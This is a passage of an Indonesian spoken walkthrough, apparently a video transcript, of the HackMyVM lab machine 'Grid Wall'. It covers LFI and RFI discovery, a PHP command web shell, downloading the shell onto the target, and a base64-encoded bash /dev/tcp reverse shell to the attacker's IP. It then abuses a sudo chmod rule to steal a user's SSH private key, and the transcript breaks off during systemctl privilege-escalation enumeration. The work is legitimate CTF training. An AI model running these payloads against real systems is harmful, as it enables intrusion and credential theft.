Halo Sobat IT semua, semoga Anda semua dalam keadaan baik-baik. Kali ini kita akan coba bermain di Hack My VM dengan coba untuk mempelajarin satu mesin di sini yang disebut dengan Grid Wall. Kali ini kita akan coba untuk login dengan menggunakan akun. Kalau kalian belum punya akun bisa create akun dulu. Jadi di sini saya sudah membuat akun, saya bisa login langsung. Di sini kita akan mempelajari tentang mesin yang disebut dengan Grid Wall, di mana kita akan mempelajari tentang LFI atau yang sering disebut dengan Local File Inclusion, dan juga kita akan mempelajari tentang RFI atau yang sering disebut dengan Remote File Inclusion, dan juga beberapa privilege escalation untuk tentang sudo, menggunakan sudo, dan juga nanti ada beberapa Linux Basic Privilege Escalation. Langsung saja, bagi yang belum mendownload bisa klik langsung download. Di sini download link, dia akan diarahkan kepada satu media tempat untuk downloadnya. Kalian bisa aja klik save atau download mungkin yang belum. Dan bagi saya karena saya sudah melakukan downloadnya, itu ada di folder saya di sini. Jadi saya biasa akan bikin satu folder di sini, dan ini adalah file zip yang sudah di download. Jika sudah selesai downloadnya, Anda bisa sekitar 1,6 GB ya. Jadi bisa Anda melakukan langsung ekstrak di sini. Kali ini kita akan klik langsung ekstrak saja. Dia akan buatkan satu folder juga yang sama untuk melakukan extraction file yang di zip. Jadi dia akan ekstrak satu file yang berisi grid world yang berartinya open virtualization. Bagi kalian yang sudah menginstal VMware, kalian bisa langsung klik kanan dan langsung klik open saja dari sini. Atau yang punya VirtualBox juga bisa sama, klik kanan langsung atau double klik aja bisa. Kali ini kita akan coba bikinkan namanya itu grid wall. Nah, setelah kita bikin grid wall, saya akan menyimpannya itu di tempat saya biasa menyimpan virtual machine itu di sini ya. Jadi akan saya buatkan satu directory hack my VM. Terus saya klik di sini hack my VM-nya, oke. Pastikan di sini sudah mengarah ke hack my VM, dan kita coba langsung melakukan import. Dia akan melakukan importing file-file dari open virtualnya itu ke VMware Workstation, karena di sini saya menggunakan VMware ya. Tunggu sampai importingnya selesai. Nah, di sini kita sudah selesai kepada configuration importingnya, dan kita akan coba melihat di sini konfigurasinya. Di sini network adapternya itu menggunakan bridge automatic. Jadi kita coba edit virtual machine-nya. Kita akan mengarahkan bridge network adapter, pastikan network adapter itu ke net supaya dia mendapatkan IP langsung pada jaringan kita sama dengan hostnya. Oke, jadi dia akan di setup langsung IP-nya oleh si grid wall, dan kita klik OK. Baru kita coba power on virtual machine-nya. Dia akan menggunakan Debian Linux grab 230 use freaking, dan dia akan booting Linux kernelnya 6 dengan AMD 64. Jadi kita tahu bahwa ini adalah 64 bit. Sambil menunggu bootnya selesai, kita akan coba untuk, nah di sini dia sudah ada IP ya, sudah selesai ada IP dengan IP version 6-nya adalah yang di bawah, version 4-nya adalah 192.11.100. Nah, untuk kita sebagai attacker, kita akan coba meload juga VMware kita yang Kali Linux kita ya. Jadi kita coba open Kali Linux kita di users. Saya biasanya bikin di sini. Saya akan pakai yang Kali upgrade saja. Nah, kita akan coba melakukan on.
pada Kali Linuxnya. Saya akan coba login ke Kali Linux saya. Oke, saya akan melakukan full screen-nya supaya untuk menampilkan semua. Dan saya akan coba untuk membuka terminal kita di sini. Dan kita coba melakukan, ini saya close dulu saja. Kita akan coba bikin di sini satu directory grid wall. Kita akan cd ke grid wall. Saya akan coba besarin supaya bisa terlihat. Yang pertama kita lakukan adalah kita akan mencoba melakukan nmap min pmin terhadap IP-nya tadi, si grid wall ini IP-nya adalah 192.168.11.100. Oke, kita akan melakukan mapping, network mapping terhadap 192.168.11 dan 100. Kita pakai main vv untuk verbose dan kita bisa enter. Kita bisa melihat di sini ada port 22 dan port 80 terbuka. Untuk port 80 biasanya ini menggunakan HTTP atau Hypertext Transfer Protocol. Kita akan membukanya dengan menggunakan Firefox. Jadi kita bisa bikin IP-nya saja di sini 192.168.11.100 IP dari si target tadi ya. Nah, cross the grid wall, we can reach every corner in the world. Oke, jadi kita akan diberikan ini. Kita dikasih satu inputan. Kita masih melihat di sini sepertinya kita sudah menemukan port 80. Untuk mempercepatnya kita bisa menggunakan min rate sama dengan 10.000 biar lebih cepat, karena kalau tidak pakai itu dia akan cukup lama ya, karena dia akan nge-scan dari 65.535 port. Oke. Nah, ini akan lebih cepat daripada yang sebelumnya. Biasanya setelah melakukan nmap dengan script untuk mencari portnya, kita bisa melihat menggunakan juga yang namanya scripting dengan port tertentu. Jadi kita melakukan port 22 dan port 80. Kita pakai script default sc dan script version -sv, atau kalian bisa langsung gabungkan dengan scv di sini untuk melihat port 80 itu menggunakan apa, versi berapa, dan port 22 itu menggunakan apa dan versi berapa. Dia akan melihat apakah port 22 di sini yang dikatakan SSH dan HTTP, kita tidak tahu ada versionnya, versi berapa, tapi dia langsung melakukan reason bahwa di sini adalah melakukan synchronizing dan acknowledge menggunakan TTL 64. Jadi kita bisa tahu bahwa ini adalah Linux dari sini. Apabila 64 itu bisa merupakan TTL dari time to live dari Unix system. Unix system bisa berupa Linux, bisa juga berupa macOS dan Solaris dan sebagainya. Apabila 127 atau 128 itu bisa menggunakan Windows Server contohnya ya. Kita akan menunggu sampai nmapnya selesai dulu.
Baiklah, sambil menunggu lebih baik kita langsung melakukan enumerasi kepada websitenya. Dan di sini kita akan melakukan enumerasi simple dengan cara kita bisa klik kanan dengan view page source. Pada saat ini kita akan melakukan yang namanya sering disebut dengan recognize atau gathering information. Kita cuma melihat-lihat saja bahwa di sini itu menggunakan apa dan seperti apa. Di sini saya melihat ada form dengan menggunakan metode get yang diarahkan ke tempat yang biasa. Input type-nya itu menggunakan namanya page. Jadi kita bisa menggunakan metode get dengan parameter get page ya. Nah, ini sama saja kita dengan bisa menggunakan di sini kita pakai kita tidak tahu apakah ini PHP. Jadi kita coba cek dulu, biasanya ini akan menjalankan index.php. Kita pastikan, ya ini berarti index.php. Kita pastikan juga dia bukan HTML. Nah, kalau dia HTML dia akan not found. Tapi kalau dia PHP, dia akan menjalankan script PHP. Oke, kita positif bahwa dia ini adalah PHP. Dan dia menggunakan parameter page. Kita bisa menggunakan parameter page sama dengan enter, dia kosong, no. Nah, di sini kita dapat return no ya. Saya coba besarkan bahwa di sini adalah no. Nah, untuk file inclusion atau LFI, kita bisa melakukan dengan sintaks file .2 // ini semacam HTTP atau HTTPS. Kita bisa menggunakan file .2 // kita akan melihat karena dia Linux kita akan coba mengakses /etc/passwd. Nah, di sini kita memastikan bahwa ini adalah confirm bahwa ini local file inclusion. Jadi dia akan menginclude file ini terhadap index.php untuk dieksekusi. Nah, ini kita sudah melakukan konfirmasi bahwa dia itu kita sudah menemukan bahwa site ini full terhadap rentan terhadap local file inclusion atau sering disebut dengan LFI. Nah, kita coba enumerasi apakah file ini juga bisa kita gunakan untuk index.php. Index.php. Nah, sepertinya filenya tidak ada atau tidak bisa kita akses. Oke, kalau begitu kita coba lihat hasil nmap kita apakah sudah keluar. Nah, di sini sudah keluar ya. Jadi hasil nmap kita ini kita bisa mengetahui bahwa SSH open port 92P1 dan port 80 itu menggunakan Apache HTTPD 246. Nah, untuk dalam skala vektornya kita bisa melakukan penyerangan terhadap site ini dengan menggunakan untuk melakukan pengetesannya bahwa kita tadi sudah confirm menggunakan etc passwd. Kalian bisa menggunakan apa yang disebut dengan positioning, log positioning, atau juga sering disebut dengan log positioning itu apa? Mari kita coba lihat. LFI. Nah, pada LFI itu bisa menggunakan log positioning atau bisa melihat untuk bisa kita mendapatkan satu remote code execution. Jadi kita bisa melakukan remote terhadap servernya gitu. Kita bisa melakukan comment terhadap personnya. Ini hampir sama ya, pakai tanda tanya, head sama dengan terus value-nya, dan di sini dia hampir sama. Pakai PHP filter resource root 13 index.php. Nah, kita coba menggunakan salah satu ini. Saya akan menggunakan PHP base 64 untuk melihat file index.php-nya. Kita coba pastikan di sini saja. No. Nah, sepertinya tidak berhasil ya untuk mengambil index.php. Baiklah, kita akan coba melakukan apa enumeration yang tadi disebut dengan RFI. Pada saat RFI, kita akan melakukan satu tempat di mana kita servernya ini kita include dengan RFI. Sekarang kita coba pastikan page-nya ini bisakah kita menload https://
google.com. Gulu-gulu sekarang nono, sekarang gulu-gulu. Nah, sepertinya dia berhasil ya untuk mendownload ini, tapi mari kita coba cari satu site yang mungkin bisa di-download sama dia atau tidak. Mari kita coba lakukan dia apakah bisa diarahkan ke sini. Kita akan coba diarahkan ke Hacktores Range. Nah, sepertinya tidak bisa ya. Saya akan coba mengarahkan dia ke website saya. Sepertinya juga tidak bisa. Mari kita coba lihat apakah dia bisa mengakses di IP kita. Saya akan coba menampilkan IP saya di sini. Di sini IP saya itu menggunakan 192.168.130. Jadi ketika saya coba di sini menggunakan NC min LNVP, saya akan membuka satu port di port 80 dan saya coba akses dia melalui HTTP. Ini saya bisa pastikan ketika saya coba mengaksesnya. Ini saya coba besarin ya. Nah, di sini ketika saya coba akses dengan menggunakan si URL http://ip saya, di atas akan ada satu connection menggunakan si URL. Nah, di sini kita akan ketahuan bahwa ini connect dari IP ini dan IP ini. Oke, saya coba Ctrl C lagi di sini dan saya coba clear. Untuk lebih jelasnya mungkin saya akan coba bagi dua terminal saya. Saya akan coba buka satu terminal lagi. Ini akan kita arahkan ke sebelah sini. Nah, ini ada dua terminal ya. Di sini kita akan coba menjalankan NC min LNVP port 80 dan kita coba melakukan call kepada IP kita tadi http://Ctrl+V IP-nya dan kita coba enter dan coba kita lihat. Nah, di sini ada host dari host yang 100 IP 100 mencoba koneksi ke kita dan mengambil slash di port 130. Oke, di sini berarti dia berhasil mengakses kita. Ketika kita Ctrl C, karena di sini dia masih belum dapat return dari kita, kita bisa return di sini dengan 200 http oke. Atau kita Ctrl C aja supaya dia bisa kembali dan oke. Nah, di sini kita coba bikin menggunakan sesuatu. Oh, tadi kita di grid wall. Kita akan membuat satu folder mkdir www untuk kita serve di cd www. Dan kita akan coba membukakan di sini. Kali ini kita akan coba pindah ke folder www dan kita akan menggunakan Python yang menggunakan modul http://server. Kita akan membuka di port 80. Nah, di sini port 80 kita masih belum ada, tapi kita coba bikin di sini satu file. Saya akan menggunakan Vim. Filenya itu mungkin kita bikin di sini rfi.php. Kita buat satu folder file atau satu file PHP di sini dengan script yang biasa untuk menampilkan PHP info. Nah, kita coba akses ke IP kita /rfi.php. Nah,
di sini sudah jelas terlihat bahwa file yang ada di server kita bukan di servernya si Great Wall mengakses ke file kita. Ini bisa kita buktikan dengan di sini bahwa IP ini mengakses RFI, mengambil metode get untuk RFI ke kita dan kita return 200. Dan file kita itu diakses sama Great Wall-nya. Dari sini kita bisa tahu ada PHP version 822 dan kita bisa lihat-lihat lagi settingan konfigurasi bahwa ini bukan di server kita. Kita bisa lihat di sini mungkin untuk memastikan bahwa dia ini bukan PHP info dari IP kita. Kita bisa lihat mungkin di configuration-nya. Saya akan coba cari configuration lebih ke sini. Nah, di sini dia melihat pada file itu dilakukan di var www.html-index.php dan dokumen rootnya itu di var www.html. Servernya itu IP confirm bahwa ini adalah IP dari 100 yang menggunakan remote address itu di IP kita ya 130. Ini positif menggunakan RFI. Jadi di sini kita sudah dapat dua vulnerability terhadap website ini. Untuk lebih jelasnya nanti setelah kita lihat scriptnya saya coba jelaskan kenapa dia bisa RFI. Nah, di sini kita akan coba melakukan yang namanya tahapan eksploitasi. Atau yang kita coba melakukan penyerangan terhadap server Great Wall. Oke. Kita akan coba melakukan command injection. Pertama-tama kita akan berikan satu kepastian bahwa ini saya akan merubah RFI-nya ini dengan script PHP yang dapat melakukan command injection. Kita bisa pakai di sini menggunakan sistem $request $_request ya. $_request kita buat satu variabel C untuk mengirim command dan kita coba save dan kita lakukan di sini RFI. Apabila kita klik di sini dia tidak ada melakukan apa-apa. Sekarang sudah PHP infonya sudah hilang karena kita sudah ganti. Tapi ketika menggunakan dan C sama dengan ID, kita sudah dapat melakukan, lihat di sini bahwa ini adalah command injection. Jadi kita coba bisa read file si index.php dengan cara base 64 index.php. Nah, kita bisa baca script dari index.php yang dijalankan oleh si server. Ini adalah PHP dari servernya. Kita coba buka atau kita coba terjemahkan dari encoding base 64 ini. Kita coba decode dengan menggunakan CyberSafe. Kita pastikan saja di sini. Terus kita menggunakan resep dari from base 64. Nah, ini adalah HTTP-nya Hello World. Kalau kita bisa lihat di sini ada Hello World title-nya. Dan dia akan menggunakan script PHP. Jika ada page, dia akan melakukan page. Jika break match-nya file HTTP dan i pada page itu kita akan di return tadi kita lihat adalah no dan gulu. Kalau google.com. Oke. Ini adalah vulnerability-nya. Dia menggunakan include add page di sini. Ini adalah vulnerability dari scriptnya. Jadi dia akan menginclude secara langsung page di sini walaupun dia melakukan satu validasi yang break match HTTP,
dan HTTPS. Pada saat ini saya cuma melihat dia bisa menggunakan file dan HTTPS. Jadi kita bisa melakukan command injection di sini. Nah, cuman kalau kita coba tes untuk melakukan injection, kita coba melakukan gaining access ke server, kita sudah bisa masuk ke sistemnya. Jadi kita coba melakukan satu lagi yang namanya itu gaining access. Jadi kita sudah fingerprint ke server dan kita sudah bisa mendapatkan remote code execution pada server. Langsung saja kita coba melakukan apa yang disebut dengan gaining access atau initial foothold. Di sini kita sudah ada command injection pada saat ini. Jadi saya akan coba melakukan apa yang disebut dengan transfer file. Oke. Jadi kita akan mentransfer satu file kita ke server, yang mana file yang akan ditransfer itu adalah file sendiri. Jadi kita bisa tidak harus menggunakan website kita sendiri. Jadi kita tidak perlu save lagi port di sini, tapi kita akan menggunakan LFI-nya. Kita menggunakan RFI untuk mendownload file ke server, dan kita akan setelah di-download kita akan menggunakan LFI local file inclusion untuk melakukan command injection. Oke, kita ada file RFI di sini. Saya akan coba rubah namanya dengan menjadi shell. Oke, saya coba lakukan di sini. Kita cuma ada satu file RFI di sini. Lalu kita coba copy RFI dengan nama, kita bikin shell.php. Nah, sekarang kita ada dua file, shell dan RFI. Semuanya dua-duanya itu hal yang sama. Nah, ini identik sekali ya, karena file yang sama cuma perbedaan di nama. Jadi kita akan download menggunakan file ini. Kita akan download shell. Kita akan coba lihat-lihat dulu di dalam foldernya ini kita downloadnya di mana. Pertama kita akan coba ls-la pada current directory. Titik. Nah, di sini saya lihat direktor kita itu dimiliki oleh si root, dan si index.php itu dimiliki oleh root. Dengan permissionnya kita tidak bisa melakukan read ya. Di sini kita cuma bisa execution, tidak bisa read. Read itu cuma digunakan oleh si group, yang mana grupnya adalah root. Untuk lebih jelasnya saya akan coba ls-la/var/www. Nah, di sini ada folder HTML yang cuman bisa kita iniin. Nah, jadi kita akan mencari satu folder di mana yang kita bisa menulis. Oke, kita akan coba lihat di /tmp. Nah, di sini kita bisa menggunakan read ya, read, write, dan t. Nah, sepertinya kita bisa melakukan sesuatu. Mari kita coba lakukan di sini touch untuk mengkonfirmasi. Touch test.txt di /tmp/test.txt. Nah, walaupun tidak ada return, tapi kita bisa melakukan ls-la. Apakah kita berhasil mengenerate? Ya, di sini kita bisa menulis satu tmp dan txt di folder tmp. Oke, berarti kita akan melakukan download dari file kita. Oke, saya akan coba melihatkan kepada Anda. Kali ini saya akan coba menggunakan Burp Suite. Saya akan coba melakukan intercept pada request ini.
saya akan coba intercept satu request ID. Saya akan mengarahkan proxy-nya ke browser dan saya akan coba enter, dia akan terintercept. Nah, ini akan saya kirim ke repeater. Di sini saya forward. Nah, pada repeater ini saya akan coba tampilkan kepada Anda, karena saya melihat sih di sini saya akan coba Ctrl C dulu ya, lalu coba clear dan coba lakukan ulang. Nah, tujuan kita adalah kita akan melakukan download terhadap file. Kita akan melakukan download terhadap file tadi yang ada cell.php dan rfi.php. Kita akan menggunakan rfi.php untuk mendownload cell.php dan kita taruh di /tmp. Oke. Jadi kita akan melakukannya itu pada di sini. Caranya itu kita akan mengarahkan dia ke rfi.php dan kita akan kirim komen URL terhadap http //11.1.130 IP-nya 192.168.11.130/cell.php min o, outputnya kita taruh dia di /tmp/cell.php. Nah, setelah begini kita harus melakukan encoding. Kita bisa klikkan sampai di sini, terus kita pencet Ctrl U langsung bisa, atau kita convert selection URL encode key character. Nah, jadi dia dalam satu parameter ya. Jadi kita bisa di dalam satu parameter. Nah, ini jadi dia sama dengan ini, page-nya warna hijau, C-nya juga biasa, dan URL-nya ini. Nah, ketika kita kirim, saya akan coba melihatkan kepada Anda ketika kita kirim di sini. Ketika kita akan mengirimkan send, di sini akan terlihat bahwa target akan mendownload rfi.php, mengakses rfi.php, dan kemudian di rfi.php melakukan command injection untuk ngedownload file cell.php yang akan ditaruh di cell.php. Jadi akan ada dua akses ke server kita. Coba kita lakukan pengiriman dan seperti yang saya katakan, dia akan ngedownload rfi.php dan cell.php. Di sini returnnya 200, oke ya. Jadi di sini kita bisa confirm bahwa dia sudah melakukan download. Untuk memastikannya kita bisa lihat di sini komennya. Kita kembalikan dengan ls-la/tmp. Kita kirim. Nah, dia akan download ini. Dan kita bisa lihat hasilnya di sini, bahwa harusnya sudah ada satu file yang namanya cell.php, dan cell.php di sini sudah bisa di read ya. Nah, mari kita coba melakukan akses ke cell.php di sini untuk dia melakukan command injection. Nah, pada saat ini kita tidak perlu lagi confirm di sini. Jadi kita sudah melakukan remote file inclusion untuk transfer data ke server. Lalu kita akan coba menggunakan cell.php di sini yang ada di /tmp. Jadi kita bisa menggunakan page-nya menggunakan file .2//tmp/cell.php. Sekarang kita coba lakukan di sini ID untuk melihat apakah command injection kita berhasil.
Nah, di sini kita sudah berhasil mengupload satu sel.php dan melakukan eksekusi terhadap itu. Sekarang kita coba melakukan initial full host-nya dengan cara kita bisa echo base -i -c. Perhatikan titik komanya, petik 1 dahulu baru petik 2 di dalamnya. Bash min i, arahkan lebih besar daripada 0. Kita akan mengarahkan ke background /dev /tcp /ip kita 192.168 titik 11.130. Kita akan menggunakan port 80. Kenapa saya menggunakan port 80? Sebenarnya saya bisa menggunakan port 81. Kita akan coba port 81. Dan kita akan coba arahkan std out-nya ke background 1. Tutup script yang pertama dan tutup yang kedua. Lalu kita pipe ke base 64 min base 64 aja. Nah, di sini kita pasti perhatikan bahwa tidak ada tanda plus atau sama dengan karena kita akan mengirimkannya melalui ini. Jadi kalau ada sama dengan, dia akan terputus. Jadi kita pastikan bahwa plus juga ini kalau kita melakukan spasi, kalau kita encode di sini misalnya AAA, kita encode, ini akan ada tanda plus. Nah, plus itu sering dianggap encoding ya. Jadi kita bisa memastikan bahwa jangan sampai ada tanda plus. Nah, ini sekitaran bash -i, jadi kita coba geser satu karakter dan coba kita enter. Nah, ini tanda sama dengannya hilang juga, tanda plusnya juga hilang. Jadi kita akan menggunakan karakter ini untuk mentes port 81 ya. Jadi kita coba di sini echo, kita echo yang tadi kita lakukan, terus kita pipe ke base 64 min decode, terus kita pipe dengan bash. Nah, untuk sementara mungkin yang belum mengerti bisa ikutin saja. Yang sudah mengerti harusnya ini sangat simple, bash yang sangat simple. Dan kita akan melakukan listener, listen nc min lnvp di port 81. Nah, ketika kita kirim di sini, kita lihat ada sesuatu yang lama terjadi tapi tidak dapat dieksekusi atau tidak dapat respon tapi tidak dapat di sini. Nah, inilah yang disebut dengan firewall. Nah, firewall di sini sebenarnya bahwa ada grid wall di sini yang menyatakan firewall. Nah, ini yang tadi makanya saya langsung coba di port 80 karena dia mengatakan wall di sini. Nah, sepertinya yang terbuka oleh servernya itu adalah port 80. Oleh karena itu kita coba melisten di port 80 dan kita konfigurasi lagi dari sini itu di port 80. Dari nmap kita tahu port 80. Jadi kita coba benerin yang payload kita. Ctrl V. Kita akan ngirim yang ini ya. Kalau kalian lihat di sini yang perubahannya itu ada di sini ya. Ctrl V. Oh no, where is it? Oh, I don't know. Kita akan kirim di sini dan ID-nya itu bukan si URL lagi ya, echo. Saya akan menggunakan plus, pastikan file kita, terus kita pipe atau tanda yang garis gini ya, ini garis base 64, kita plus untuk melakukan spasi, sebenarnya ini ada spasi min d. Nah, jadi kita di sini bisa pakai %20 atau tanda plus min d, terus kita pipe lagi menggunakan bash. Oke.
dan kita sudah pastikan kita melisten di port 80. Ketika kita kirim, saya akan coba close di sini untuk melihat di sininya apakah hasil atau tidak. Kita akan coba kirimkan, dan kita langsung begitu dikirim kita langsung dapat sel di sini ya. Oke, jadi kita akan dapat satu sel dari HTML. Ini tidak akan melakukan return response sampai kita melakukan kesalahan di sini. Kesalahan yang paling fatal itu adalah ketika kita tidak menstabilize sel kita, karena di sini bukan sel biasa. Ini adalah PHP sel. Jadi coba kita upgrade sel kita dengan menggunakan Python atau menggunakan script atau apa yang ada di server. Nah, kali ini saya akan coba lihat apakah ada Python 3 pada server terinstall dengan menggunakan metode which. Nah, di sini saya mengetik which Python 3, dia akan mereturn apa yang saya ketikkan. Nah, di sini yang akan kita coba menstabilize dengan menggunakan Python 3. Kita akan menggunakan Python 3 c import pty.spawn /bin/bash. Nah, kalian harus aware juga terhadap tanda kutip ini ya. Kalau kalian menggunakan petik 1 yang di depan, kalian menggunakan petik 2 di dalamnya. Oke, jangan sampai terbalik-balik atau salah menempatkannya ya. Oke, kita coba enter, Ctrl Z, dan kita akan melakukan suspend terhadap ini. Comment ancient lvnv ini akan disuspend, dan kita akan melakukan stty raw -echo. Untuk -echo itu untuk menghilangkan ini, dan kita menggunakan foreground untuk melakukan ini kepada background lagi biar dia maju ke foreground. Jadi dia sudah continue lagi, komen ini di continue. Kita bisa melakukan export term sama dengan xterm, dan enter. Nah, ketika kita melakukan ini, di sini juga terjadi error, itu sudah tidak bermasalah ya. Nah, jadi tadi ada flip langsung ketika kita melakukan foreground di sini dan kita echo, dia sudah mau di sini error atau apa dia sudah bisa, dan kita sudah bisa melakukan command clear atau kita bisa Ctrl C tapi tanpa terputus koneksinya. Oke. Sampai di sini sebenarnya kita sudah fully TTY, cuman belum sampai ke tahap benar-benar perlu. Jadi kalau kita lihat stty kita di sini min a, dia akan menggunakan rows kolom atau kolomnya nol. Jadi kalau kita ketik di sini sampai panjang, biasanya dia akan nimpa. Nah, dia akan nimpa ke belakangnya ya. Itu. Dia akan nimpa lagi tuh. Nah, gimana cara benerin itu? Bisa kita Ctrl C dulu. Yang ini akan saya coba close. Kita sudah selesai sampai di situ. Di sini saya coba tidak menggunakan worksheet lagi. Nah, di TTY kita kali ini kita akan coba besarkan. Nah, ini kita coba set rows dan columns-nya. Jadi kita Ctrl T di sini. Kita lihat, kita samakan hurufnya, mungkin fontnya. Nah, ini ya. Jadi kita bisa lihat stty min a pada di sini. Kita lihat di sini rows-nya 37 dan kolomnya 156. Kita bisa set di sini stty rows 37 calls 156 ya, sama. Oke, kita enter. Nah, sekarang apabila kita print di sini banyak, dia akan turun ke bawah sampai mana, jadi tidak menimpa kayak yang tadi ya. Nah, itu gunanya. Jadi kita ketika kita ping atau apapun bisa kita lihat. Oke, saya akan coba Ctrl C dan saya coba clear. Kita sudah bisa ada di sini. Kita ada di /index.html. Di sini folder square ini adalah
folder dari home si www data. Yang pertama-tama tadi index.php sudah kita lihat. Yang pertama-tama yang kita lakukan di sini adalah kita akan melakukan privilege escalation. Nah, privilege escalation itu kita menaikkan user kita dari www data ke siapa. Nah, mari kita coba lihat dulu ls-la/home. Biasanya user pada Linux akan mempunyai satu directory. Nah, di sini ada directory wall yang dimana permissionnya itu adalah dwrx. Jadi dia directory dengan permissionnya ini mungkin dwrx ini adalah 700 atau ya si wall sepertinya 700 ya. Nah, kita akan coba lihat melakukan privilege escalation. Kita coba cat/etc/passwd. Kita pastikan bahwa ini adalah grupnya si wall. Oke. Nah, di sini kita coba ls-la si cat/etc/passwd tadi. Kita lihat www data di sini dia mempunyai squirrel atau apa namanya ini ya. Kalau saya sering bilangnya ini cacing ya. Kita www data itu mempunyai home folder. Jadi kita nggak tahu home folder kita itu sepertinya di var www. Nah, ini home folder kita itu di var www. Walaupun usernya tidak bisa login lewat SSH karena di sini no login, kita bisa melakukan eskalasi. Nah, coba kita pertama sekali kita lakukan adalah sudo min-l. Nah, pada sudo min-l kali ini kita melihat bahwa www data dapat menjalankan komen pada grid walls itu dengan tanpa password. Kita menggunakan user wall untuk melakukan chmod. Nah, sementara kita coba cd/home/wall. Di sini permission denied. Sekarang kita coba menggunakan sudo min-u wall. Nah, dia di sini menggunakan user wall, kita harus menggunakan min-u wall. Nah, karena di sini no password, harusnya kita bisa menjalankan /bin/chmod. Kita akan coba chmod folder/home/wall dengan permission 777. Nah, ini kita akan coba melihat isi folder dari si home wall ini. Yang tadinya permission denied, kita rubah permissionnya dengan 777 atau open to all. Coba kita enter. Sekarang kita coba cd to home wall. Kita sudah bisa dan tidak masuk permission denied. Kita bisa ls-la di sini. Nah, di sini kita sudah melihat ada user flag. Bisakah kita melakukan flagnya? Coba kita cat user.flag permission denied. Nah, oke, saya akan coba melakukan chmod lagi. Kali ini /bintang. Jadi semuanya di sini akan saya coba permissionnya itu ke 777. Nah, ketika saya lihat ls-la lagi, kita bisa melihat permission di sini ada berubah. User.txt ini sudah berubah. Oke, mari kita coba cat user.flag. Nah, kita sudah berhasil mendapatkan satu flag di sini. Flag user, dimana kita bisa submitkan ke room kita di sini grid wall tadi. Paste, kita submit. Sepertinya tidak login. Oke lah, kalau begitu kita coba bypass saja. Kita lanjutkan. Kita sudah memastikan bahwa kita menemukan flag di sini. Sekarang kita coba lihat di folder SSH-nya. Apakah kita menemukan sesuatu. .ssh. Nah, kita ada ID RSA dan ada authorized keys yang bisa kita sepertinya tidak bisa kita baca, tapi di sini bisa read ya. Kita bisa cat .ssh authorized key. Nah, di sini ada AAAB3 di sini.
Kita pastikan dulu apakah ini AAAA dan ini semua ada sama dengan si ID RSA. ID RSA kita bisa kita baca cat.ssh/id RSA id rsa.pub. Hampirnya sama ya. Kalau menurut saya ini SPR 8 benar dan APNZCE1Y benar. Coba kita lihat di sini 17J75 benar. Nah, ini berarti kita positif bahwa ID RSA ini sudah terdaftar di server. Sekarang kita coba clear dulu ls-a. Kita akan pindah ke cd.ssh ls-a. Di sini ada ID RSA, ini yang kita gunakan. Sekarang kita coba chmod si ID RSA ini dengan kita .ssh titik ssh titik id underscore rsa, dan kita coba enter. Sekarang kita coba lihat ID RSA nya sudah berubah jadi rwx yang tadinya cuma read write ya. Nah, kita coba cat ID RSA. Nah, ini semua satu file ini akan kita coba kopikan. Nah, kita akan coba kopikan ke sini ke folder kita. Saya akan coba menggunakan vim file RSA dan saya coba enter satu line, escape. Dan coba kita xxd wall.rsa. Nah, di sini harusnya ada 2 OA ya. Harusnya cuma ada satu deh. Oke, coba kita clear dan coba kita vim wall.rsa. Harusnya cuma ada satu ya. End of private key. Nah, kita coba begini saja dulu. Nah, pada saat ini kita akan coba melakukan chmod 600 wall.rsa supaya kita bisa melakukan SSH min i include filenya si wall RSA kepada wall add IP-nya tadi 192.168.11.100 dan kita lihat di sini dan kita yes kan. Dia masih meminta password. Harusnya sih sudah tidak minta password ya. Coba kita Ctrl C. Dan karena permissionnya mungkin kita karena sudah merusak permissionnya di sini, mari kita coba clear. Terus kita coba benerin lagi permissionnya dengan permission si ADRSA itu kita set 700 saja. Terus si authorize key-nya juga kita set ke 700. Lalu kita cd dan ls-a. Si SSH-nya juga kita coba permissionnya kita rubah ke 700. ls-a. Oh, kita sudah merubah si wall-nya langsung ya. Seharusnya kita ngerubah si .ssh dulu. Nah, di sini kita sudah lihat dan kita sudah tidak bisa melisting si home wall lagi di sini ls-a /home/wall. Kita sudah tidak masuk padahal kita masih di foldernya ya. Jadi kita ls-a di folder home, wall itu sudah kembali seperti biasa. Oke, sekarang kita coba melakukan remote dan kita sudah melakukan privilege escalation ya. Jadi kita sudah masuk sebagai wall ke grid wall. Sampai di sini mudah-mudahan semua sudah mengerti. Dan kita akan coba lihat di sini kita sudah masuk ke wall dan kita coba lihat lagi sudo min l. Nah, di sini dia bisa menggunakan all untuk passwordnya itu sistem bctl bin sistem ctl dan start dari service class service page-nya. Nah, ini kita bisa lihat
Saya coba clear dulu di sini. Sudo min L, kita bisa lihat sistem CTL ini akan dijalankan di menjalankan start si class first service. Nah, kita coba lihat di sini. Kita akan coba cd slash etc, di mana folder Linux itu akan menjalankan sistem CTL itu di dalam folder sistem D, folder sistem slash system. Kita akan lihat di sini ada class first service ini. Mari kita coba lihat. Harusnya dia menggunakan service-nya ada di sini. Class service.services. Mari kita coba lihat di sini, kita baca cat class services-nya ini, tapi di sini dia punya ANSI root. Exec start slash user bin slash class. Dia akan melakukan start pada ini service binary class service per services. Nah, coba kita copy ini dan coba kita lihat file apakah itu. File command not found. Coba kita cat. Di sini sangat file elf sepertinya ya, elf binary ls-a. Oke, kita akan coba melakukan itu. Sebelum melakukan itu, saya akan coba cd ke home foldernya ls-a. Kita sudah bisa masuk ke folder yang tadi kita konfigurasi. Nah, kita akan coba sudo min L dan kita akan lakukan sistem CTL start class services. Nah, kita tidak tahu apakah start services ini apa gunanya. Kita bisa menggunakan sudo sistem CTL karena dia sudah langsung menjalankan sebagai service atau all no password. Kita bisa menggunakan juga di sini sudo min root sistem CTL start ini, dan dia sudah berjalan tapi tidak dapat return apa-apa. Nah, mari kita coba lihat ps min aux. Kita coba lihat apa yang tadi dijalankan. Nah, di sini ada jalan user sebagai root, user bin class services. Tapi kita coba lihat lagi di sini service apa aja yang berjalan, tidak ada. Mari kita coba lihat service ini menjalankan apa dengan cara ps min ef min forest. Mungkin dia akan, ini tadi jalan kita untuk login masuk ke server, si firstnya itu tidak ada tadi apa-apa ya, cuman ini kita jalan sebagai root si service ini. Nah, mari kita coba lihat menggunakan ini wall pts untuk login SSH. Ini yang kita lakukan, cuman yang ini tidak tahu tadi ini langsung melakukan oleh hasil root. Oke, kita akan coba lihat ss min plntu. Nah, di sini kita coba lihat bahwa ada port berapa aja yang terbuka. Nah, di sini kita akan melihat ada listen di port 322333211. Dan kita tidak tahu 33211 itu apa. Kita bisa melakukan nc atau kita coba nc ke port ini. Kita coba cek. Nah, di sini adalah HTTP ya, HTTP request 33211. Untuk melakukan ini kita bisa ngebukanya karena dia cuma bisa di local port. Kita coba arahkan 